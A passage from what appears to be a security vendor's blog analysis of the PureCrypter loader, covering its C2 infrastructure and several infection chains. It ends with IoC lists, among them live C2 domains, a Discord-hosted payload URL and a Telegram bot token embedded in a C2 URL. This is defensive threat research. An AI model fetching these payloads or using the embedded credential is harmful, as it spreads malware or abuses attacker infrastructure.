/04122022/net_Ygikzmai.bmp
/04122022/azne_Jzoappuq.bmp
/04122022/pm_Dxjlqugu.bmp
/03252022/azne_Rmpsyfmd.bmp

# pattern 3
/Rrgbu_Xruauocq.png
/Gepstl_Mouktkmu.bmp
/Zhyor_Uavuxobp.png
/Xgjbdziy_Kglkvdfb.png
/Ankwgqtwf_Bdevsqnz.bmp
/Osgyjgne_Ymgrebdt.png
/Rrgbu_Xruauocq.png
/Gepstl_Mouktkmu.bmp
/Osgyjgne_Ymgrebdt.png
/Osgyjgne_Ymgrebdt.png
/Zhyor_Uavuxobp.png

</code></pre>
<p>After analyzing several samples, we found that there is a correspondence between the requested image name and the downloader&apos;s AssmblyName.</p>
<table>
<thead>
<tr>
<th>PictureName</th>
<th>AssmblyName</th>
</tr>
</thead>
<tbody>
<tr>
<td>Belcuesth_Ipdtbadv.png</td>
<td>Belcuesth</td>
</tr>
<tr>
<td>Kzzlcne_Prgftuxn.png</td>
<td>Kzzlcne</td>
</tr>
<tr>
<td>newminer2_Jrltkmeh.jpg</td>
<td>newminer2</td>
</tr>
<tr>
<td>Belcuesth_Ipdtbadv.png</td>
<td>Belcuesth</td>
</tr>
<tr>
<td>Nykymad_Bnhmcpqo.bmp</td>
<td>Nykymad</td>
</tr>
<tr>
<td>my_ori_Ywenb_Yzueqpjp.bmp</td>
<td>my ori Ywenb</td>
</tr>
</tbody>
</table>
<p>and the content after the underscore always matches the regular expression</p>
<blockquote>
<p>[A-Z][a-zA-Z]{7}</p>
</blockquote>
<h1 id="c2-and-propagation-analysis">C2 and propagation analysis</h1>
<p>PureCrypter has been active this year, and we have detected more than 200 C2 domains and IPs, and more than 10 propagated families. In the cases we have seen, the propagation chain is generally long, and the downloader module of PureCrypter is often used in conjunction with various other types of predecessor downloaders. Because there are too many C2s, here is an introduction to <code>185.215.113.89</code> as an example in terms of scale and propagation methods.</p>
<h2 id="c2-analysis">C2 analysis</h2>
<p>This C2 is more active than others among the C2s we detected, and its active time is from mid-April to early June this year, as shown in the figure below.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/xmon_185.215.113.89_ganwang.png" alt="xmon_185.215.113.89_ganwang" loading="lazy"></p>
<p>Its activity level can be reflected visually by our graph system.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/domain_ip_of_butler_202205-1.png" alt="domain_ip_of_butler_202205-1" loading="lazy"></p>
<p>It can be seen that it is associated with more domains and IPs, and the following is part of the IP&apos;s domain name resolution during this period.</p>
<pre><code>2022-04-14 22:47:34	2022-07-05 00:42:16	22	rockrock.ug	A	185.215.113.89	
2022-04-21 08:22:03	2022-06-13 09:17:50	15	marnersstyler.ug	A	185.215.113.89	
2022-04-17 03:17:41	2022-06-10 04:31:27	2538	qwertzx.ru	A	185.215.113.89	
2022-04-24 02:16:46	2022-06-09 00:11:24	3	hubvera.ac.ug	A	185.215.113.89	
2022-04-15 23:47:43	2022-06-08 19:24:59	43	timekeeper.ug	A	185.215.113.89	
2022-04-15 11:34:35	2022-06-08 19:24:59	35	boundertime.ru	A	185.215.113.89	
2022-04-14 23:01:50	2022-06-08 15:33:25	24	timebound.ug	A	185.215.113.89	
2022-04-15 21:58:54	2022-06-08 05:43:21	7	www.rockrock.ug	A	185.215.113.89	
2022-04-16 20:50:41	2022-06-08 01:44:01	54	beachwood.ug	A	185.215.113.89	
2022-04-23 16:23:41	2022-06-07 18:30:51	5	asdsadasrdc.ug	A	185.215.113.89	
2022-05-02 22:35:40	2022-06-07 04:34:12	17	leatherlites.ug	A	185.215.113.89	
2022-05-29 17:46:00	2022-06-07 03:50:36	3	underdohg.ac.ug	A	185.215.113.89	
2022-04-15 22:34:53	2022-06-07 03:33:10	18	rockphil.ac.ug	A	185.215.113.89	
2022-04-15 03:09:13	2022-06-07 03:19:50	14	pdshcjvnv.ug	A	185.215.113.89	
2022-04-15 03:04:12	2022-06-07 03:12:04	16	mistitis.ug	A	185.215.113.89	
2022-04-16 03:08:46	2022-06-07 03:08:48	18	nicoslag.ru	A	185.215.113.89	
2022-04-19 02:33:31	2022-06-07 02:37:08	16	danwisha.ac.ug	A	185.215.113.89	
2022-05-28 23:56:02	2022-06-05 05:14:50	7	underdohg.ug	A	185.215.113.89	
2022-05-10 14:44:28	2022-06-02 17:40:12	24	jonescourtney.ac.ug	A	185.215.113.89	
2022-06-02 07:44:25	2022-06-02 07:44:25	1	triathlethe.ug	A	185.215.113.89	
2022-04-24 03:05:38	2022-06-01 16:54:59	2191	qwertasd.ru	A	185.215.113.89	
2022-04-17 09:34:27	2022-06-01 01:42:07	2	partaususd.ru	A	185.215.113.89	
2022-04-25 00:08:53	2022-05-31 07:17:00	5	timecheck.ug	A	185.215.113.89	
2022-04-21 02:36:41	2022-05-31 01:20:37	21	courtneyjones.ac.ug	A	185.215.113.89	
2022-04-16 19:09:02	2022-05-31 01:02:02	14	marksidfgs.ug	A	185.215.113.89	
2022-04-25 03:01:15	2022-05-30 03:04:29	10	mofdold.ug	A	185.215.113.89	
2022-04-15 02:36:21	2022-05-30 02:32:53	17	check-time.ru	A	185.215.113.89	
2022-04-18 02:21:26	2022-05-30 02:22:30	17	agenttt.ac.ug	A	185.215.113.89	
2022-04-17 03:17:46	2022-05-29 03:17:26	15	qd34g34ewdfsf23.ru	A	185.215.113.89	
2022-04-19 02:25:06	2022-05-29 02:22:57	14	andres.ug	A	185.215.113.89	
2022-04-16 02:27:44	2022-05-29 02:22:47	16	asdasgs.ug	A	185.215.113.89	
</code></pre>
<p>From the visits in column 3, differences in the number of visits to these domains can be found, with overall visits in the thousands, and this is only one of the many C2s we see.</p>
<p>Through correlation analysis, we found that <code>185.215.113.89</code> is often used in conjunction with two C2s, <code>62.204.41.69</code> (March) and <code>45.143.201.4</code>(June), and their relationship can be correlated using the chart below.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--21--2.png" alt="Image--21--2" loading="lazy"></p>
<h2 id="propagation-analysis">Propagation analysis</h2>
<p>PureCrypter uses the dual module mechanism of downloader+injector, the former is disseminated and then the latter is disseminated, which is equivalent to adding a link to the dissemination chain, plus the author&apos;s usual means to hide the objector by means of fake image, encoding transmission, etc., which is complicated enough in itself.</p>
<p>The author also put a lot of effort in the downloader propagation piece, we see the way through the bat2exe bundled crack software, the use of VBS and powershell script loader, combined with Godzilla front loader and many other ways, the result of these operations superimposed is the spread chain is generally deeper and more complex. In May we even found cases of spreading Raccoon through PureCrypter, which further spread Azorult, Remcos, PureMiner, and PureClipper.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/PC-RACCOON-OTHER.png" alt="PC-RACCOON-OTHER" loading="lazy"></p>
<p>Here are a few typical propagation techniques.</p>
<h3 id="1-bat2exepowershellvbsmeteoritepurecrypter-spreading-mars-stealer">1, &quot;Bat2Exe+Powershell+VBS+Meteorite+PureCrypter&quot; spreading Mars Stealer</h3>
<p>This is mainly seen in some cracking software, downloader module is bundled to the former for propagation with Bat2Exe. The actual payload files stored in the resource are released to the tmp directory and triggered by the start.bat. The files released in the tmp directory are shaped as follows.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--1-.png" alt="Image--1-" loading="lazy"></p>
<p>The start.bat command takes the shape of&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--2-.png" alt="Image--2-" loading="lazy"></p>
<p>In the case we analyzed, the .lnk file is used to start the powershell to execute the malicious command.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--3-.png" alt="Image--3-" loading="lazy"></p>
<p>Powershell decodes a base64-encoded VBS loader.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--8-.png" alt="Image--8-" loading="lazy"></p>
<p>The VBS loader further releases a downloader and runs the latter via shellcode. The key information of this downloader is stored in the resource, including the process name and download url, as shown in the image below.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--28-.png" alt="Image--28-" loading="lazy"></p>
<p>The downloader is named Meteorite according to the process name after running, and the url in the above figure corresponds to the downloader module of PureCrypter, and the complete communication process is as follows.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/25e6857acc38482a85b9863f5749d21a-----.png" alt="25e6857acc38482a85b9863f5749d21a-----" loading="lazy"></p>
<p>The final payload is Mars Stealer, c2: <code>rockrock.ug/gggate.php</code>, with the following configuration information:</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--24-.png" alt="Image--24-" loading="lazy"></p>
<h3 id="2-vbspowershell-purecrypter-propagating-pureminer">2, &quot;VBS/Powershell + PureCrypter&quot; propagating PureMiner</h3>
<p>The C2 involved is <code>89.34.27.167</code>. The entry can be either a VBS script or a Powershell script, here is an example of VBS script.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--4-.png" alt="Image--4-" loading="lazy"></p>
<p>The network communication traffic is as follows.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/VBS_CASE.png" alt="VBS_CASE" loading="lazy"></p>
<p>Powershell script is as follows.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--25-.png" alt="Image--25-" loading="lazy"></p>
<p>The Powershell script downloads and runs the downloader module of PureCrypter, which proceeds to download the injector, here it is more specific to use Discord to distribute the injector:</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--26-.png" alt="Image--26-" loading="lazy"></p>
<p>The final payload is PureMiner and C2 is as follows:</p>
<pre><code>185.157.160.214
pwn.oracleservice.top
pwn.letmaker.top

port: 8080, 8444
</code></pre>
<h3 id="3-unknown-net-downloader-purecrypter-to-spread-agenttesla-redline">3, &quot;unknown .NET downloader + PureCrypter&quot; to spread AgentTesla, RedLine</h3>
<p>The downloader family is unknown, and its runtime is also divided into multiple stages, where the stage0 module is responsible for loading the stage1 malicious module in the resource.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--5-.png" alt="Image--5-" loading="lazy"></p>
<p>The stage1 module will continue to load the next stage module stage2 after running.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--6-.png" alt="Image--6-" loading="lazy"></p>
<p>stage2 module is also a Crypter (not yet named), different from PureCrypter, he also provides a download function, used to download the malicious PureCrypter downloader module, that is, the figure of puty.exe.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--7-.png" alt="Image--7-" loading="lazy"></p>
<p>The malware can be decrypted from the resource with  the key <code>bnvFGkCKlnhQ</code> using  the following algorithm.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--29-.png" alt="Image--29-" loading="lazy"></p>
<p>Two families of binaries are spread. Stage2&apos;s payload is AgentTesla with C2:  <code>https[:]//api.telegram.org/bot5421147975:AAGrsGnLOHZfFv7yHuj3hZdQSOVmPodIAVI/sendDocument</code></p>
<p>PureCrypter&apos;s payload is RedLine with C2:</p>
<pre><code>IP: workstation2022.ddns.net:62099
ID: cheat
</code></pre>
<h1 id="summary">Summary</h1>
<p>PureCrypter is a MaaS type botnet that is still active and has spread more than 10 other families of payloads, with generally complex spreading practices. There might be a fairly big and resourceful team behind it, so it won&#x2019;t surprised us if they continuously add and spread other malicious families in the future. We will keep an eye on it and share more information when it is needed.</p>
<h1 id="contact-us">Contact us</h1>
<p>Readers are always welcomed to reach us on <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> or email us to <strong>netlab[at]360.cn</strong>.</p>
<h2 id="iocs">IoCs</h2>
<h3 id="md5">MD5</h3>
<table>
<thead>
<tr>
<th>Family Name</th>
<th>MD5</th>
</tr>
</thead>
<tbody>
<tr>
<td>Bat2Exe Downloader</td>
<td>424ed5bcaae063a7724c49cdd93138f5</td>
</tr>
<tr>
<td>VBS downloader</td>
<td>3f20e08daaf34b563227c797b4574743</td>
</tr>
<tr>
<td>Powershell downloader</td>
<td>c4c5167dec23b6dd2d565cd091a279e4</td>
</tr>
<tr>
<td>Unknown .NET Downloader</td>
<td>9b70a337824bac612946da1432295e9c</td>
</tr>
</tbody>
</table>
<h3 id="c2-url">C2 &amp;URL</h3>
<pre><code>agenttt.ac.ug
andres.ug
asdasgs.ug
asdsadasrdc.ug
beachwood.ug
boundertime.ru
check-time.ru
courtneyjones.ac.ug
danwisha.ac.ug
hopeforhealth.com.ph
hubvera.ac.ug
jonescourtney.ac.ug
leatherlites.ug
marksidfgs.ug
marnersstyler.ug
mistitis.ug
mofdold.ug
momomolastik.ug
nicoslag.ru
partaususd.ru
pdshcjvnv.ug
qd34g34ewdfsf23.ru
qwertasd.ru
qwertzx.ru
raphaellasia.com
rockphil.ac.ug
rockrock.ug
timebound.ug
timebounder.ru
timecheck.ug
timekeeper.ug
triathlethe.ug
underdohg.ac.ug
underdohg.ug
www.rockrock.ug
212.192.246.195
37.0.11.164:8080
80.66.75.123
89.34.27.167
91.243.44.142
185.215.113.89
62.204.41.69
45.143.201.4
https://cdn.discordapp.com/attachments/994652587494232125/1004377750762704896/ps1-6_Hjuvcier.png
</code></pre>
]]></content:encoded></item><item><title><![CDATA[PureCrypter Loader持续活跃，已经传播了10多个其它家族]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>&#x5728;&#x6211;&#x4EEC;&#x7684;&#x65E5;&#x5E38;botnet&#x5206;&#x6790;&#x5DE5;&#x4F5C;&#x4E2D;&#xFF0C;&#x78B0;&#x5230;&#x5404;&#x79CD;loader&#x662F;&#x5E38;&#x4E8B;&#x3002;&#x8DDF;&#x5176;&#x5B83;&#x79CD;&#x7C7B;&#x7684;malware&#x76F8;&#x6BD4;&#xFF0C;loader&#x7684;&#x7279;&#x6B8A;&#x4E4B;&#x5904;&#x5728;&#x4E8E;&#x5B83;&#x4E3B;&#x8981;&#x7528;&#x6765;&#x201C;&#x63A8;&#x5E7F;&#x201D;&#xFF0C;</p>]]></description><link>https://blog.netlab.360.com/purecrypter/</link><guid isPermaLink="false">63873b9a8b1c1e0007f5301f</guid><category><![CDATA[loader]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[malware-as-a-service]]></category><category><![CDATA[PureCrypter]]></category><category><![CDATA[MaaS]]></category><category><![CDATA[Bat2Exe]]></category><category><![CDATA[AgentTesla]]></category><category><![CDATA[Mars]]></category><category><![CDATA[raccoon]]></category><category><![CDATA[PureMiner]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[wanghao]]></dc:creator><pubDate>Mon, 29 Aug 2022 01:20:17 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>&#x5728;&#x6211;&#x4EEC;&#x7684;&#x65E5;&#x5E38;botnet&#x5206;&#x6790;&#x5DE5;&#x4F5C;&#x4E2D;&#xFF0C;&#x78B0;&#x5230;&#x5404;&#x79CD;loader&#x662F;&#x5E38;&#x4E8B;&#x3002;&#x8DDF;&#x5176;&#x5B83;&#x79CD;&#x7C7B;&#x7684;malware&#x76F8;&#x6BD4;&#xFF0C;loader&#x7684;&#x7279;&#x6B8A;&#x4E4B;&#x5904;&#x5728;&#x4E8E;&#x5B83;&#x4E3B;&#x8981;&#x7528;&#x6765;&#x201C;&#x63A8;&#x5E7F;&#x201D;&#xFF0C;&#x5373;&#x5728;&#x88AB;&#x611F;&#x67D3;&#x673A;&#x5668;&#x4E0A;&#x4E0B;&#x8F7D;&#x5E76;&#x8FD0;&#x884C;&#x5176;&#x5B83;&#x7684;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;&#x6839;&#x636E;&#x6211;&#x4EEC;&#x7684;&#x89C2;&#x5BDF;&#xFF0C;&#x5927;&#x90E8;&#x5206;loader&#x662F;&#x4E13;&#x6709;&#x7684;&#xFF0C;&#x5B83;&#x4EEC;&#x548C;&#x63A8;&#x5E7F;&#x7684;&#x5BB6;&#x65CF;&#x4E4B;&#x95F4;&#x5B58;&#x5728;&#x7ED1;&#x5B9A;&#x5173;&#x7CFB;&#x3002;&#x800C;&#x5C11;&#x6570;loader&#x5BB6;&#x65CF;&#x4F1A;&#x5C06;&#x81EA;&#x5DF1;&#x505A;&#x6210;&#x901A;&#x7528;&#x7684;&#x63A8;&#x5E7F;&#x5E73;&#x53F0;&#xFF0C;&#x53EF;&#x4EE5;&#x4F20;&#x64AD;&#x5176;&#x5B83;&#x4EFB;&#x610F;&#x5BB6;&#x65CF;&#xFF0C;&#x5B9E;&#x73B0;&#x6240;&#x8C13;&#x7684;malware-as-a-service&#xFF08;MaaS&#xFF09;&#x3002;&#x8DDF;&#x4E13;&#x6709;loader&#x76F8;&#x6BD4;&#xFF0C;MaaS&#x7C7B;&#x578B;&#x663E;&#x7136;&#x66F4;&#x5371;&#x9669;&#xFF0C;&#x66F4;&#x5E94;&#x8BE5;&#x6210;&#x4E3A;&#x6211;&#x4EEC;&#x7684;&#x9996;&#x8981;&#x5173;&#x6CE8;&#x76EE;&#x6807;&#x3002;</p>
<p>&#x672C;&#x6587;&#x4ECB;&#x7ECD;&#x6211;&#x4EEC;&#x524D;&#x6BB5;&#x65F6;&#x95F4;&#x770B;&#x5230;&#x7684;&#x4E00;&#x4E2A;MaaS&#x7C7B;&#x578B;&#x7684;loader&#xFF0C;&#x5B83;&#x540D;&#x4E3A;PureCrypter&#xFF0C;&#x4ECA;&#x5E74;&#x975E;&#x5E38;&#x6D3B;&#x8DC3;&#xFF0C;&#x5148;&#x540E;&#x63A8;&#x5E7F;&#x4E86;10&#x591A;&#x4E2A;&#x5176;&#x5B83;&#x7684;&#x5BB6;&#x65CF;&#xFF0C;&#x4F7F;&#x7528;&#x4E86;&#x4E0A;&#x767E;&#x4E2A;C2&#x3002;&#x56E0;&#x4E3A;<a href="https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter?ref=blog.netlab.360.com">zscaler</a>&#x5DF2;&#x7ECF;&#x505A;&#x8FC7;&#x8BE6;&#x7EC6;&#x7684;&#x6837;&#x672C;&#x5206;&#x6790;&#xFF0C;&#x672C;&#x6587;&#x4E3B;&#x8981;&#x4ECE;C2&#x548C;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#x89D2;&#x5EA6;&#x4ECB;&#x7ECD;&#x6211;&#x4EEC;&#x770B;&#x5230;&#x7684;PureCrypter&#x4F20;&#x64AD;&#x6D3B;&#x52A8;&#xFF0C;&#x5206;&#x6790;&#x5176;&#x8FD0;&#x4F5C;&#x8FC7;&#x7A0B;&#x3002;</p>
<p>&#x672C;&#x6587;&#x8981;&#x70B9;&#x5982;&#x4E0B;&#xFF1A;</p>
<ul>
<li>PureCrypter&#x662F;&#x4E00;&#x6B3E;&#x4F7F;&#x7528;C#&#x7F16;&#x5199;&#x7684;loader&#xFF0C;&#x81F3;&#x5C11;2021&#x5E74;3&#x6708;&#x4FBF;&#x5DF2;&#x51FA;&#x73B0;&#xFF0C;&#x80FD;&#x4F20;&#x64AD;&#x4EFB;&#x610F;&#x7684;&#x5176;&#x5B83;&#x5BB6;&#x65CF;&#x3002;</li>
<li>PureCrypter&#x4ECA;&#x5E74;&#x6301;&#x7EED;&#x6D3B;&#x8DC3;&#xFF0C;&#x5DF2;&#x7ECF;&#x4F20;&#x64AD;&#x4E86;&#x5305;&#x62EC;Formbook&#x3001;SnakeKeylogger&#x3001;AgentTesla&#x3001;Redline&#x3001;AsyncRAT&#x7B49;&#x5728;&#x5185;&#x7684;10&#x591A;&#x4E2A;&#x6076;&#x610F;&#x5BB6;&#x65CF;&#x3002;</li>
<li>PureCrypter&#x4F5C;&#x8005;&#x62E5;&#x6709;&#x8F83;&#x591A;&#x7684;&#x63A8;&#x5E7F;&#x8D44;&#x6E90;&#xFF0C;&#x6211;&#x4EEC;&#x68C0;&#x6D4B;&#x5230;&#x7684;C2 &#x57DF;&#x540D;&#x548C;IP&#x591A;&#x8FBE;&#x4E0A;&#x767E;&#x4E2A;&#x3002;</li>
<li>PureCrypter&#x4F5C;&#x8005;&#x559C;&#x6B22;&#x4F7F;&#x7528;&#x56FE;&#x7247;&#x540D;&#x540E;&#x7F00;&#x7ED3;&#x5408;&#x5012;&#x7F6E;&#x3001;&#x538B;&#x7F29;&#x548C;&#x52A0;&#x5BC6;&#x7B49;&#x65B9;&#x5F0F;&#x8EB2;&#x907F;&#x7F51;&#x7EDC;&#x68C0;&#x6D4B;&#x3002;</li>
<li>PureCrypter&#x7684;&#x63A8;&#x5E7F;&#x884C;&#x4E3A;&#x4F20;&#x64AD;&#x94FE;&#x6761;&#x666E;&#x904D;&#x8F83;&#x957F;&#xFF0C;&#x591A;&#x6570;&#x4F1A;&#x4F7F;&#x7528;&#x524D;&#x7F6E;protector&#xFF0C;&#x751A;&#x81F3;&#x642D;&#x914D;&#x5176;&#x5B83;loader&#xFF0C;&#x68C0;&#x6D4B;&#x96BE;&#x5EA6;&#x8F83;&#x5927;&#x3002;</li>
</ul>
<p>&#x603B;&#x7684;&#x6765;&#x8BF4;&#xFF0C;PureCrypter&#x7684;&#x4F20;&#x64AD;&#x60C5;&#x51B5;&#x53EF;&#x4EE5;&#x7528;&#x4E0B;&#x56FE;&#x603B;&#x7ED3;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--0-.png" alt="Image--0-" loading="lazy"></p>
<p>&#x4E0B;&#x9762;&#x4ECE;&#x6837;&#x672C;&#x5206;&#x6790;&#x548C;&#x5178;&#x578B;&#x4F20;&#x64AD;&#x6848;&#x4F8B;&#x89D2;&#x5EA6;&#x505A;&#x4E00;&#x4ECB;&#x7ECD;&#x3002;</p>
<h1 id>&#x6837;&#x672C;&#x5206;&#x6790;</h1>
<p>PureCrypter&#x4F7F;&#x7528;&#x4E86;<a href="https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter?ref=blog.netlab.360.com">package&#x673A;&#x5236;</a>&#xFF0C;&#x7531;&#x4E24;&#x4E2A;&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;&#x7EC4;&#x6210;&#xFF1A;downloader&#x548C;injector&#xFF0C;&#x5B83;&#x4EEC;&#x90FD;&#x4F7F;&#x7528;C#&#x7F16;&#x5199;&#xFF0C;&#x5176;&#x4E2D;downloader&#x8D1F;&#x8D23;&#x4F20;&#x64AD;injector&#xFF0C;&#x540E;&#x8005;&#x91CA;&#x653E;&#x5E76;&#x8FD0;&#x884C;&#x6700;&#x7EC8;&#x7684;&#x76EE;&#x6807;&#x5BB6;&#x65CF;&#x4E8C;&#x8FDB;&#x5236;&#x6587;&#x4EF6;&#x3002;&#x5B9E;&#x9645;&#x64CD;&#x4F5C;&#x65F6;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x901A;&#x8FC7;builder&#x751F;&#x6210;downloader&#x548C;injector&#xFF0C;&#x7136;&#x540E;&#x5148;&#x8BBE;&#x6CD5;&#x4F20;&#x64AD;downloader&#xFF0C;&#x540E;&#x8005;&#x4F1A;&#x5728;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x4E0B;&#x8F7D;&#x5E76;&#x6267;&#x884C;injector&#xFF0C;&#x518D;&#x7531;injector&#x5B8C;&#x6210;&#x5176;&#x4F59;&#x5DE5;&#x4F5C;&#x3002;&#x4ECE;&#x4EE3;&#x7801;&#x903B;&#x8F91;&#x4E0A;&#x770B;&#xFF0C;downloader&#x6A21;&#x5757;&#x76F8;&#x5BF9;&#x7B80;&#x5355;&#xFF0C;&#x6837;&#x672C;&#x6DF7;&#x6DC6;&#x7A0B;&#x5EA6;&#x8F83;&#x4F4E;&#xFF0C;&#x6CA1;&#x6709;&#x590D;&#x6742;&#x7684;&#x73AF;&#x5883;&#x68C0;&#x6D4B;&#x548C;&#x6301;&#x4E45;&#x5316;&#x7B49;&#x64CD;&#x4F5C;&#xFF0C;&#x800C;injector&#x5219;&#x4F7F;&#x7528;&#x4E86;loader&#x91CC;&#x5E38;&#x89C1;&#x7684;&#x5947;&#x6280;&#x6DEB;&#x5DE7;&#xFF0C;&#x6BD4;&#x5982;2&#x8FDB;&#x5236;&#x6DF7;&#x6DC6;&#x3001;&#x8FD0;&#x884C;&#x73AF;&#x5883;&#x68C0;&#x6D4B;&#x3001;&#x542F;&#x52A8;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x7B49;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x7ED3;&#x5408;&#x5B9E;&#x9645;&#x7684;&#x4F8B;&#x5B50;&#x7B80;&#x5355;&#x4ECB;&#x7ECD;&#x4E0B;downloader&#x548C;injector&#x3002;</p>
<h2 id="downloader">downloader&#x6A21;&#x5757;</h2>
<p>&#x8BE5;&#x6A21;&#x5757;&#x76F4;&#x63A5;&#x8C03;&#x7528;WebClient&#x7684;DownLoadData&#x65B9;&#x6CD5;&#x8FDB;&#x884C;HTTP&#x4E0B;&#x8F7D;&#xFF0C;&#x6CA1;&#x6709;&#x8BBE;&#x7F6E;&#x5355;&#x72EC;&#x7684;HTTP header&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--11-.png" alt="Image--11-" loading="lazy"></p>
<p>injector&#x7684;uri&#x901A;&#x5E38;&#x4E5F;&#x662F;&#x660E;&#x6587;&#x4FDD;&#x5B58;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;&#x4E0B;&#x8F7D;&#x7ECF;&#x8FC7;&#x5012;&#x7F6E;&#x5904;&#x7406;&#x7684;&#x6837;&#x672C;&#x7684;&#x53D8;&#x79CD;&#x7684;&#x4F8B;&#x5B50;&#xFF0C;&#x4ECE;&#x89E3;&#x6790;&#x4EE3;&#x7801;&#x80FD;&#x770B;&#x51FA;&#x6765;HTTP payload&#x505A;&#x4E86;&#x5012;&#x7F6E;&#x5904;&#x7406;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--12-.png" alt="Image--12-" loading="lazy"></p>
<p>&#x5728;&#x672B;&#x5C3E;&#x53EF;&#x53D1;&#x73B0;&#x660E;&#x663E;&#x7684;&#x88AB;&#x5012;&#x7F6E;&#x7684;PE Header&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--13-.png" alt="Image--13-" loading="lazy"></p>
<p>&#x6700;&#x540E;&#x901A;&#x8FC7;Assembly.Load&#x52A0;&#x8F7D;&#x6062;&#x590D;&#x597D;&#x7684;injector&#xFF08;.DLL&#x6587;&#x4EF6;&#xFF09;&#xFF0C;&#x8C03;&#x7528;&#x660E;&#x6587;&#x7F16;&#x7801;&#x7684;&#x5165;&#x53E3;&#x65B9;&#x6CD5;&#xFF0C;&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--14-.png" alt="Image--14-" loading="lazy"></p>
<p>PureCrypter&#x5BF9;injector&#x4E0B;&#x8F7D;&#x4FDD;&#x62A4;&#x8FD9;&#x5757;&#x76F8;&#x5BF9;&#x7B80;&#x5355;&#xFF0C;&#x76EE;&#x524D;&#x770B;&#x9664;&#x4E86;&#x4E0A;&#x9762;&#x63D0;&#x5230;&#x7684;&#x5012;&#x7F6E;&#xFF08;reverse&#xFF09;&#x7F16;&#x7801;&#x5916;&#xFF0C;&#x8FD8;&#x6709; gzip&#x538B;&#x7F29;&#x3001;&#x5BF9;&#x79F0;&#x52A0;&#x5BC6;&#x7B49;&#x65B9;&#x5F0F;&#xFF0C;&#x8FD9;&#x79CD;&#x7F16;&#x7801;&#x662F;&#x56FA;&#x5B9A;&#x7684;&#xFF0C;&#x5373;builder&#x5728;&#x751F;&#x6210;downloader&#x548C;injector&#x65F6;&#x5C31;&#x5DF2;&#x7ECF;&#x786E;&#x5B9A;&#x597D;&#x7F16;&#x7801;&#x65B9;&#x5F0F;&#xFF0C;&#x4E0D;&#x5B58;&#x5728;&#x8FD0;&#x884C;&#x52A8;&#x6001;&#x6539;&#x53D8;&#x7684;&#x60C5;&#x51B5;&#x3002;</p>
<p>&#x4E0B;&#x9762;&#x662F;&#x4F7F;&#x7528;&#x4F7F;&#x7528;gzip&#x538B;&#x7F29;&#x540E;&#x4F20;&#x8F93;injector&#x7684;&#x4F8B;&#x5B50;&#xFF0C;&#x5728;&#x6D41;&#x91CF;&#x5F00;&#x5934;&#x53EF;&#x4EE5;&#x53D1;&#x73B0;GZip&#x7684;magic header&#xFF1A;<code>1F 8B 08 00</code>&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--15-.png" alt="Image--15-" loading="lazy"></p>
<p>&#x6211;&#x4EEC;&#x8FD8;&#x78B0;&#x5230;&#x8FC7;&#x4F7F;&#x7528;AES&#x52A0;&#x5BC6;&#x7684;&#x4F8B;&#x5B50;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--16-.png" alt="Image--16-" loading="lazy"></p>
<p>&#x9664;&#x4E86;AES&#xFF0C;PureCrypter&#x8FD8;&#x652F;&#x6301;&#x4F7F;&#x7528;DES&#x3001;RC4&#x7B49;&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;&#x3002;</p>
<h2 id="injector">injector&#x6A21;&#x5757;</h2>
